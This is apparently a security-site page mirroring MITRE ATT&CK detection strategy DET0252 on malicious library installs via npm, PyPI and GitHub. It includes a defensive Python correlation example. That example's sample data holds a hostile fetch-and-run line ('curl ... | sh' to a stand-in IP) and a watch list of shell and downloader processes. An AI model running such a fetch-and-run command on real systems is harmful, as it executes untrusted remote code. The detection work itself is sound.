DET0252: User-Initiated Malicious Library Installation via Package Manager (T1204.005)
Analyst context for executives and security teams
This detection strategy concerns users installing malicious software libraries through package managers or public code repositories. The business issue is that normal developer or user behavior can become the execution path for adversary code, bypassing controls focused only on phishing attachments or traditional initial access. For leaders, this is a software supply-chain and endpoint execution risk: the key question is whether the organization can see, govern, and investigate package installation activity on Linux, macOS, and Windows systems.
Executive priority
Prioritize this where developers, administrators, build systems, or power users can install packages from sources such as npm, PyPI, or public repositories like GitHub. Useful executive questions include: who is allowed to install libraries, which repositories are trusted, whether package activity is logged, and whether SOC and incident response teams can quickly determine what was installed, by whom, on which host, and when. This supports operational resilience, software supply-chain governance, audit evidence, and incident scoping.
Technical view
The related ATT&CK technique is T1204.005 Malicious Library under Execution, with Linux, macOS, and Windows listed as platforms. Because the detection strategy object does not include official detection logic, teams should validate visibility around user-initiated package manager activity and subsequent process execution. SOC and IR teams should be able to correlate package install events, command-line activity, user context, host identity, source repository or package name where available, and follow-on execution or persistence-related behavior.
Likely telemetry
- Endpoint process creation and command-line telemetry
- Package manager install/update logs where available
- User, host, and privilege context for installation activity
- Network or proxy evidence of access to package managers and public repositories
- File creation or modification evidence for installed libraries and related artifacts
Detection direction
- Validate that package installation activity is visible across Linux, macOS, and Windows endpoints in scope.
- Correlate package manager execution with user identity, source location, package name, and subsequent child processes or unusual execution behavior.
- Tune for the difference between expected developer/build activity and unusual user-initiated installs on non-developer systems or privileged hosts.
- Use relationship context to focus on execution outcomes rather than only the download event; the risk materializes when malicious library code runs.
- Document blind spots where endpoint command-line logging, package manager logs, proxy logs, or repository metadata are not collected.
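The correlation and tuning steps above, as an added worked example that is not part of the ATT&CK object or this page's source text. It runs over a handful of constructed process-creation events (the event shape, hostnames, user names, package names, URLs, the developer-host allowlist and the trusted-source list are all assumptions for illustration, not a real product schema): it recognizes package-manager install commands, pulls out the package and the source it was fetched from, walks the install's descendant processes for follow-on execution, and only raises a finding when the install is off-baseline (non-developer host, privileged account, untrusted or default public source, or an install that spawned a shell or downloader).

```python
# Added example (not ATT&CK content, not a vendor schema). All names, hosts,
# users, URLs and allowlists below are constructed for illustration.
import os
import shlex
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample process-creation events: ts, host, user, pid, ppid, cmd.
EVENTS = [
    {"ts": 1, "host": "dev-lt-01", "user": "alice", "pid": 100, "ppid": 1,
     "cmd": "npm install left-pad-utils --registry https://registry.npmjs.org/"},
    {"ts": 2, "host": "dev-lt-01", "user": "alice", "pid": 101, "ppid": 100,
     "cmd": "node /home/alice/project/node_modules/left-pad-utils/install.js"},
    {"ts": 3, "host": "fin-ws-07", "user": "bob", "pid": 200, "ppid": 1,
     "cmd": "pip install requestz"},
    {"ts": 4, "host": "fin-ws-07", "user": "bob", "pid": 201, "ppid": 200,
     "cmd": "/bin/sh -c 'curl -s http://203.0.113.5/s.sh | sh'"},
    {"ts": 5, "host": "fin-ws-07", "user": "bob", "pid": 202, "ppid": 201,
     "cmd": "sh"},
    {"ts": 6, "host": "build-01", "user": "root", "pid": 300, "ppid": 1,
     "cmd": "pip install -i https://pypi.internal.example/simple requests"},
]

# Assumed local policy (the "who may install, from where" decisions above).
DEVELOPER_HOSTS = {"dev-lt-01", "build-01"}
TRUSTED_SOURCES = {"https://registry.npmjs.org/", "https://pypi.internal.example/simple"}
PRIVILEGED_USERS = {"root", "SYSTEM", "Administrator"}

# Install verbs per package manager, and flags that name a package source.
PACKAGE_MANAGERS = {"npm": {"install", "i", "add"}, "pip": {"install"},
                    "pip3": {"install"}, "gem": {"install"}}
SOURCE_FLAGS = {"--registry", "-i", "--index-url", "--extra-index-url", "--source"}
# Interpreters and downloaders a library install normally has no reason to spawn.
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "curl", "wget",
                       "powershell", "powershell.exe", "cmd.exe"}


def first_token(cmd: str) -> str:
    """Basename of the executable in a command line (POSIX quoting assumed)."""
    argv = shlex.split(cmd)
    return os.path.basename(argv[0]) if argv else ""


def parse_install(cmd: str) -> Optional[Tuple[str, Optional[str], Optional[str]]]:
    """Return (manager, package, source) for an install command, else None.
    package is None for a bare 'npm install' that resolves from a manifest."""
    argv = shlex.split(cmd)
    # Normalize "python -m pip install ..." to "pip install ...".
    if len(argv) >= 3 and argv[0].startswith("python") and argv[1] == "-m" and argv[2] == "pip":
        argv = argv[2:]
    if len(argv) < 2:
        return None
    manager = os.path.basename(argv[0])
    verbs = PACKAGE_MANAGERS.get(manager)
    if not verbs or argv[1] not in verbs:
        return None
    package, source = None, None
    args = iter(argv[2:])
    for a in args:
        if a in SOURCE_FLAGS:
            source = next(args, None)        # value follows the flag
        elif a.startswith("-"):
            continue                          # other option, ignore
        elif package is None:
            package = a                       # first positional = package
    return manager, package, source


@dataclass
class Finding:
    host: str
    user: str
    manager: str
    package: Optional[str]
    source: Optional[str]
    children: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)


def correlate(events, developer_hosts, trusted_sources) -> List[Finding]:
    """One Finding per install event; reasons is non-empty when it is off-baseline."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e["ppid"], []).append(e)
    findings = []
    for e in events:
        parsed = parse_install(e["cmd"])
        if parsed is None:
            continue
        manager, package, source = parsed
        f = Finding(e["host"], e["user"], manager, package, source)
        # Follow-on execution: walk every descendant of the install process.
        stack = list(by_parent.get(e["pid"], []))
        while stack:
            c = stack.pop()
            f.children.append(c["cmd"])
            tok = first_token(c["cmd"])
            if tok in SUSPICIOUS_CHILDREN and f"install spawned {tok}" not in f.reasons:
                f.reasons.append(f"install spawned {tok}")
            stack.extend(by_parent.get(c["pid"], []))
        # Tuning: developer/build hosts are expected to install; others are not.
        if e["host"] not in developer_hosts:
            f.reasons.append("install on non-developer host")
            if e["user"] in PRIVILEGED_USERS:
                f.reasons.append("install with privileged account")
        if source is None:
            f.reasons.append("no explicit source; default public index")
        elif source not in trusted_sources:
            f.reasons.append(f"untrusted source {source}")
        findings.append(f)
    return findings


def alerts(events=EVENTS) -> List[Finding]:
    return [f for f in correlate(events, DEVELOPER_HOSTS, TRUSTED_SOURCES) if f.reasons]


if __name__ == "__main__":
    for f in alerts():
        print(f"{f.host} {f.user} {f.manager} {f.package!r} from {f.source!r}: {f.reasons}")
```

Of the three installs in the sample, the developer's npm install from the trusted registry and the build host's pip install from the internal index produce no reasons, even though the npm install spawned a `node` post-install script; only the pip install on the finance workstation is raised, because it came from the default public index, ran on a non-developer host, and spawned `sh` and `curl`. Real deployments will need the package-manager table extended (yarn, pnpm, gem, cargo, etc.), Windows command lines parsed without POSIX quoting rules, and the allowlists fed from asset inventory rather than hard-coded.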
Mitigation priorities
- Define which users and systems are permitted to install software libraries and from which sources.
- Prefer trusted or controlled package sources where practical, especially for development and build environments.
- Limit unnecessary local administrative privileges that enable uncontrolled package installation.
- Ensure endpoint and network logging can support investigation of package installation and follow-on execution.
- Include malicious library installation scenarios in incident response playbooks and software supply-chain governance reviews.
Analyst notes and limits
The supplied ATT&CK detection strategy has no official description or detection text, so this take is based on the object name, external reference, and its relationship to T1204.005 Malicious Library. The relationship supports an execution-focused view involving user installation of malicious libraries through package managers such as npm and PyPI and public repositories such as GitHub.
No specific analytics, data components, mitigations, platforms on the detection strategy object itself, or procedure examples were supplied. Local validation is required to determine applicable package managers, normal installation patterns, logging coverage, and acceptable risk.
No official description is available in the imported ATT&CK source object.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.005 | Malicious Library (sub-technique) | This object detects Malicious Library. |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 8ae2f672a619… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: DET0252 (open source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.